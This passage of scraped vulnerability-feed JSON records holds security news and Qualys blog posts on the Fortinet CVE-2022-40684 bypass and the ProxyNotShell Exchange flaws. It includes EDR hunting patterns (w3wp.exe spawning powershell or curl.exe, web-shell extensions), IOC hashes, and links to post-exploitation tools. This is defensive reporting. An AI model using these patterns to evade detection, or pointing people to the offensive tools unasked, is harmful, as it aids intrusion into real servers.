[7.0.7](<https://docs.fortinet.com/document/fortigate/7.0.7/fortios-release-notes/289806/resolved-issues>) and [7.2.2](<https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/289806/resolved-issues>), and FortiProxy versions [7.0.7](<https://docs.fortinet.com/document/fortiproxy/7.0.7/release-notes/534553/resolved-issues>) and [7.2.1](<https://docs.fortinet.com/document/fortiproxy/7.2.1/release-notes/534553/resolved-issues>) released this week:\n\n * FortiOS - From 7.0.0 to 7.0.6 and from 7.2.0 to 7.2.1\n * FortiProxy - From 7.0.0 to 7.0.6 and 7.2.0\n\n\"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade,\" the company [cautioned](<https://twitter.com/Gi7w0rm/status/1578305143530848256>) in an alert shared by a security researcher who goes by the alias Gitworm on Twitter.\n\nAs temporary workarounds, the company recommends that users disable internet-facing HTTPS administration until the upgrades can be put in place, or, alternatively, enforce a firewall policy on \"[local-in traffic](<https://community.fortinet.com/t5/FortiGate/Technical-Tip-Local-traffic-logs-and-policy-ID-0/ta-p/196654>).\"\n\nWhen reached for a comment, Fortinet acknowledged the advisory and noted that it's delaying public notice until its customers have applied the fixes.\n\n\"Timely and ongoing communications with our customers is a key component in our efforts to best protect and secure their organization,\" the company said in a statement shared with The Hacker News. \"Customer communications often detail the most up-to-date guidance and recommended next steps to best protect and secure their organization.\"\n\n\"There are instances where confidential advance customer communications can include early warning on advisories to enable customers to further strengthen their security posture, which then will be publicly released in the coming days to a broader audience. 
The security of our customers is our first priority.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-10-07T16:47:00", "type": "thn", "title": "Fortinet Warns of New Auth Bypass Flaw Affecting FortiGate and FortiProxy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-08T04:39:51", "id": "THN:FCEF4EA34B53C743863FE92365E26AFF", "href": "https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T12:04:40", "description": "Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082, that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverages a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange 
Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying Exchange server by leveraging existing Exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should limit the vulnerability's accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outside attacker the ability to read emails directly off an organization's server, the ability to breach the organization with CVE-2022-41040 Remote Code Execution, and the ability to implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. 
This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical assets is also an option, though it is only practicable if such a measure does not impact vital operations, and it should ideally be treated as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive, unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enables organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof \u2013 to 
ProxyNotShell.\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell is the most cost-efficient way to evaluate exactly which assets are exposed and to devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-28T04:05:53", "description": "Welcome to the third edition of the Qualys Research Team\u2019s \u201cThreat Research Thursday\u201d, where we collect and curate notable new tools, techniques, procedures, threat intelligence, cybersecurity news, malware attacks, and more. Feedback on our second edition, [Qualys Threat Research Thursday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/29/qualys-threat-research-thursday>), is more than welcome. We would love to hear from you! \n\n\n\n## From the Qualys Blog \n\nHere is a roundup of the most interesting blogs from the Qualys Research Team over the past couple of weeks: \n\n * [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) \u2013 How do you detect the ProxyNotShell vulnerability that was released a month ago? This blog talks about all of this and more. Definitely worth a look since no official patches are available as of today! 
\n * [Leeloo Multipath: Authorization bypass and symlink attack in multipathd (CVE-2022-41974 and CVE-2022-41973)](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/25/leeloo-multipath-authorization-bypass-and-symlink-attack-in-multipathd-cve-2022-41974-and-cve-2022-41973>) \u2013 Fresh from the Qualys Research Team! Read more about our indigenous research in discovering these vulnerabilities affecting the `multipathd` daemon.\n * [Text4Shell: Detect, Prioritize and Remediate The Risk Across On-premise, Cloud, Container Environment Using Qualys Platform](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/27/text4shell-detect-prioritize-and-remediate-the-risk-across-on-premise-cloud-container-environment-using-qualys-platform>) - All the details for detecting, prioritizing and remediating the Text4Shell vulnerability can be found in this post.\n\n## New Tools & Techniques \n\n**ScubaGear** \u2013 This assessment tool was developed by CISA. It verifies that an M365 tenant\u2019s configuration conforms to the policies described in the SCuBA Minimum Viable Secure Configuration Baseline documents. Currently, available baseline documents cater to Hybrid Azure Active Directory (AD), Microsoft 365 Defender, Microsoft Exchange Online, OneDrive for Business, Power BI, the Microsoft Power Platform, SharePoint Online and Microsoft Teams. ScubaGear v0.1.0 source can be [found on GitHub](<https://github.com/cisagov/ScubaGear>). \n\n**RustHound** \u2013 This cross-platform active directory collector for BloodHound is written in Rust. It will work on Linux, Windows, or MacOS. Though not all features from SharpHound are implemented yet, it is worthwhile to get this into our detection engineering cycles so that effective detections can be developed. [Check out the GitHub project](<https://github.com/OPENCYBER-FR/RustHound>). \n\n**WinDbg** \u2013 I know, I know! WinDbg is old. 
But the latest version of the WinDbg Preview debugger is now available with regex search and restricted mode support. [Check out WinDbg 1.2107.13001.0](<https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86>). \n\n**Sysmon** \u2013 This release includes fixes and adds a new Windows Event ID 28 for FileBlockShredding, which is generated when Sysmon detects and blocks file shredding by tools such as SDelete. [Download Sysmon v14.1](<https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon>). \n\n**SockFuzzer** \u2013 This is an all-in-one network syscall fuzzer for XNU. It helps you fuzz the network stack on macOS and Linux-based hosts in userland. Check [it out here](<https://github.com/googleprojectzero/SockFuzzer>). \n\n**SharpEfsPotato** \u2013 This is a neat demonstration of local privilege escalation from SeImpersonatePrivilege using the Encrypting File System Remote (EFSRPC) Protocol. It combines two different projects: SweetPotato and SharpSystemTriggers/SharpEfsTrigger. Read more on [SharpEfsPotato](<https://github.com/bugch3ck/SharpEfsPotato>). \n\n**TokenMan** \u2013 This new open-source token manipulation tool will help you in post-exploitation activities when working with Azure Active Directory \u2013 especially useful when you have Family of Client ID (FOCI) access. Download [the tool here](<https://github.com/secureworks/TokenMan>). \n\n## New Vulnerabilities\n\n**CVE-2022-41040, CVE-2022-41082** \u2013 aka ProxyNotShell! Mitigations are available for these 0day vulnerabilities. They apply to Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. Limited, targeted attacks are still being seen in the wild for these server-side request forgery (SSRF) and remote code execution (RCE) vulnerabilities. Read more on the [Microsoft Customer Guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) page. 
Qualys customers can scan for QID 50122 and find vulnerable and unpatched Microsoft Exchange systems in their environment. \n\n**CVE-2022-41352** \u2013 This publicly exploited vulnerability, affecting Zimbra Collaboration (ZCS) 8.8.15 and 9.0, allows a remote attacker to gain incorrect access to any other user accounts. Qualys VMDR customers can keep a lookout for QID 377618 in their reports to identify vulnerable installations. It is recommended that affected customers update to ZCS 9.0.0 Patch 27 or ZCS 8.8.15 Patch 34. More information about this can be [found here](<https://wiki.zimbra.com/wiki/Security_Center>). \n\n**CVE-2022-40684** \u2013 This Fortinet authentication bypass vulnerability allows attackers to log in as an administrator on affected FortiOS, FortiProxy, and FortiSwitchManager products. A simple HTTP packet to the administrative interface is enough to compromise an affected device. Qualys VMDR and WAS QIDs 150585, 730623, and 43921 should get you started with finding vulnerable systems in your environment. Follow up by patching the vulnerability as described in this [vendor-published advisory](<https://www.fortiguard.com/psirt/FG-IR-22-377>). Reminder \u2013 a PoC exploiting this vulnerability is already out in the wild. \n\n## Noteworthy Mentions \n\nThe Qualys Threat Research Team contributed to the October 25, 2022 release of **MITRE ATT&CK v12**! Our contribution from [Defending Against Scheduled Task Attacks in Windows Environments](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments>) was cited under [T1053.005](<https://attack.mitre.org/techniques/T1053/005/>). This release introduces \u201cCampaigns\u201d, where adversary activity conducted over a specific period on common targets is grouped together. This version of ATT&CK for Enterprise contains 14 Tactics, 193 Techniques, 401 Sub-techniques, 135 Groups, 14 Campaigns, and 718 Pieces of Software. 
[Read more here](<https://attack.mitre.org/resources/updates/updates-october-2022/>). \n\nWe also contributed to the awesome and open-source **Atomic Red Team** framework. Examples are [Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-22---disable-uac-admin-consent-prompt-via-consentpromptbehavioradmin-registry-key>) and [Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message](<https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md#atomic-test-2---configure-legalnoticecaption-and-legalnoticetext-registry-keys-to-display-ransom-message>) by our Senior Engineer, Threat Research, [Harshal](<https://blog.qualys.com/author/htupsamudre>). \n\n## Threat Thursdays Webinar \n\nIf you missed last month's [Threat Thursday](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar, where the Qualys Threat Research Team presented an in-depth analysis of AsyncRAT, you can watch it on demand at the link below. 
\n\n[Watch Now](<https://gateway.on24.com/wcc/eh/3347108/lp/3987473/qualys_research_team_threat_thursdays_october_2022/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-28T00:58:53", "type": "qualysblog", "title": "Qualys Research Team: Threat Thursdays, October 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082", "CVE-2022-41352", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-10-28T00:58:53", "id": "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T12:05:09", "description": "On September 29, 2022, active attacks against Microsoft Exchange were reported by Vietnamese cybersecurity company GTSC. The researcher at GTSC reported two critical vulnerabilities (now named \u201cProxyNotShell\u201d) in Microsoft Exchange Server via two advisories issued by [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/upcoming/>): [ZDI-CAN-18333](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=by%3A%20Marcin%20Wiazowski-,ZDI%2DCAN%2D18333,-Microsoft>) and [ZDI-CAN-18802](<https://www.zerodayinitiative.com/advisories/upcoming/#:~:text=Zero%20Day%20Initiative-,ZDI%2DCAN%2D18802,-Microsoft>).\n\nThe first flaw (CVE-2022-41040) is a Server-Side Request Forgery (SSRF) vulnerability. The second flaw (CVE-2022-41082) allows remote code execution (RCE) when PowerShell is accessible to the attacker. 
Microsoft mentions that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities. \n\nOn September 30, 2022, Microsoft released an [advisory](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) acknowledging that they are _\u201caware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d_\n\nThreat actors are chaining these two zero-day vulnerabilities to deploy China Chopper web shells on vulnerable Microsoft Exchange Servers for persistence and data theft. Based on the code of these web shells, GTSC suspects that these threat actors are based in China. As a result, CISA has added these vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThese vulnerabilities affect the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\n## Qualys Vulnerability Coverage (QID)\n\nQualys customers can use the following QID to identify potentially vulnerable assets in their environments.\n\n**QID**| **Title**| **Release Versions** \n---|---|--- \n50122| Microsoft Exchange Server Multiple Vulnerabilities (Zero Day)| VULNSIGS-2.5.596-5 or later and QAGENT-SIGNATURE-SET-2.5.596.5-4 or later \n \n## Detect ProxyNotShell Using Qualys VMDR\n\nHere are the steps that your organization can take to rapidly respond to the zero-day threat of ProxyNotShell using Qualys VMDR.\n\n### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of your potentially vulnerable assets. 
[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange Server systems.\n\nUse the following Qualys Query Language (QQL) string:\n\n_operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\nQualys CSAM displays inventory of all Microsoft Exchange Server assets\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, for example: \u201cProxyNotShell Exchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the zero-days as well as any new Windows Exchange Server that is provisioned in your environment. Tagging makes these grouped assets available for querying, reporting, and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\nUsing the VMDR Dashboard, you can track \u2018Exchange 0-day\u2019, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Read the Article (Qualys Customer Portal)**: [ProxyNotShell Exchange Server 0-Day Dashboard | Critical Global View](<https://success.qualys.com/support/s/article/000006994>)\n\nExchange Server 0-Day Dashboard in Qualys VMDR\n\n### Discover ProxyNotShell Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you will want to detect which of these assets have flagged this vulnerability. 
VMDR automatically detects new vulnerabilities like these based on the always up-to-date Qualys KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_VMDR query: vulnerabilities.vulnerability.qid: 50122_\n\nQualys VMDR isolates all Exchange Server assets with the vulnerability QID 50122\n\nQID 50122 is available in signature version VULNSIGS-2.5.596-5 and above. It can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.596.5-4 and above.\n\n## Microsoft Guidance for Risk Mitigation of ProxyNotShell\n\nMicrosoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019.\n\nNote: Microsoft Exchange Online is not affected. 
\n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\n### Remediation/Mitigation of ProxyNotShell\n\n[Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) and [Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) (CAR) customers can leverage the scripting capabilities of both products to deploy mitigation actions to their Exchange Servers.\n\nBy leveraging Qualys CAR\u2019s scripting capabilities or Patch Management's pre-actions capabilities, customers can deploy a PowerShell script to apply the mitigations recommended by Microsoft.\n\nRefer to the Qualys scripting library on GitHub for [the mitigation script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Zero%20Day/CVE-2022-41040%2C41082\\(ProxyNotShell%20Microsoft%20Exchange%20Server\\)>) and execute it via Qualys CAR on the required assets.\n\nAs per the mitigation introduced by Microsoft, Qualys Policy Compliance customers can evaluate the mitigation on Exchange targets with the following controls:\n\n**24782 Status of the 'URL Rewrite Instructions' configured for the site and applications**\n\n**24802 Status of the 'Remote PowerShell access' setting enabled for users**\n\n## Detect Malicious Behavior related to ProxyNotShell using Qualys Multi-Vector EDR\n\nBased on the post-exploitation activity from multiple threat actors, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) customers can hunt for the following malicious activities: \n\n 1. Detecting unusual children of w3wp.exe such as: \n * csc.exe \n * transcodingservice.exe \n * werfault.exe \n * powershell \n * powershell_ise \n * python \n * curl.exe \n 2. 
Detecting webshell-like files with the following extensions being written on an Exchange Server: \n * .ashx \n * .aspx \n * .asmx \n * .asax \n\n## Detect Exploitation Attempts related to ProxyNotShell using Qualys Context XDR \n\nInterested [Qualys Context XDR](<https://www.qualys.com/apps/extended-detection-response/>) customers can contact their Technical Account Managers for the following rules: \n\n 1. T1190 - [Akamai WAF] ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 2. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected (CVE-2022-41040/CVE-2022-41082) \n 3. T1190 - [Trend Micro TippingPoint IPS] ProxyNotShell RCE Vulnerability Exploitation Detected \n 4. T1190 - ProxyNotShell RCE Vulnerability Exploitation Detected via Firewall (CVE-2022-41040/CVE-2022-41082) \n\nWith Qualys Context XDR, customers have the power to write their own detections as well. An example of a generic rule that detects ProxyNotShell attempts is shown below: \n\n\n\n## Indicators of Compromise (IOCs) for ProxyNotShell\n\n**Filenames**| **SHA256 Hash**| **Path** \n---|---|--- \nPxh4HG1v.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nRedirSuiteServiceProxy.aspx| b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nxml.ashx| c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1| \nerrorEE.aspx| be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257| %ProgramFiles%\\Microsoft\\ExchangeServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nDll.dll| 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82| \nDll.dll| 
45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9| \nDll.dll| 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0| \nDll.dll| 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3| \nDll.dll| C8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2| \n180000000.dll| 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e| \n \n## Contributors\n\n * [Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), Director, Vulnerability and Threat Research, Qualys\n * [Mehul Revankar](<https://blog.qualys.com/author/mRevankar>), VP, Product Management & Engineering for VMDR, Qualys\n * [Mayuresh Dani](<https://blog.qualys.com/author/mayuresh>), Manager, Threat Research, Qualys\n * [Lavish Jhamb](<https://blog.qualys.com/author/ljhamb>), Solution Architect, Compliance Solutions, Qualys\n * [Eran Livne](<https://blog.qualys.com/author/elivne>), Senior Director, Endpoint Remediation, Qualys\n * Mukesh Choudhary, Compliance Research Analyst, Qualys\n * Mohd Anas Khan, Compliance Research Analyst, Qualys\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * David Lu, Senior Engineer, Threat Research, Qualys\n * Felix Jimenez Saez, Director, Product Management, 
Qualys", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T23:25:55", "type": "qualysblog", "title": "Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T23:25:55", "id": "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2022-10-13T16:50:00", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft addresses two new zero-day vulnerabilities: CVE-2022-41033, an Elevation of Privilege vulnerability exploited in the wild, and CVE-2022-41043, an Information Disclosure vulnerability that was publicly disclosed. 
Microsoft has not released security updates for two actively exploited zero-day vulnerabilities dubbed ProxyNotShell.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T12:15:39", "type": "hivepro", "title": "Did Patch Tuesday address the zero-day flaw in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41043"], "modified": "2022-10-13T12:15:39", "id": "HIVEPRO:F327ABE1BEFB40043AD5F33DA5692070", "href": "https://www.hivepro.com/did-patch-tuesday-address-the-zero-day-flaw-in-microsoft-exchange/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-03T06:08:35", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft Exchange Server has two unpatched zero-day vulnerabilities. One of them is a Server-Side Request Forgery (SSRF) vulnerability (CVE-2022-41040), while the second is a remote code execution (RCE) vulnerability (CVE-2022-41082) in PowerShell. 
An authenticated attacker can chain these two vulnerabilities to gain access to a victim's system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:21:56", "type": "hivepro", "title": "Unpatched zero-day vulnerabilities of Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T10:21:56", "id": "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "href": "https://www.hivepro.com/unpatched-zero-day-vulnerabilities-of-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T10:11:40", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary An unpatched CVE-2022-41352 remote code execution (RCE) vulnerability in the Zimbra Collaboration Suite (ZCS) is being actively exploited. It allows attackers to upload arbitrary files and execute malicious operations on vulnerable hosts. 
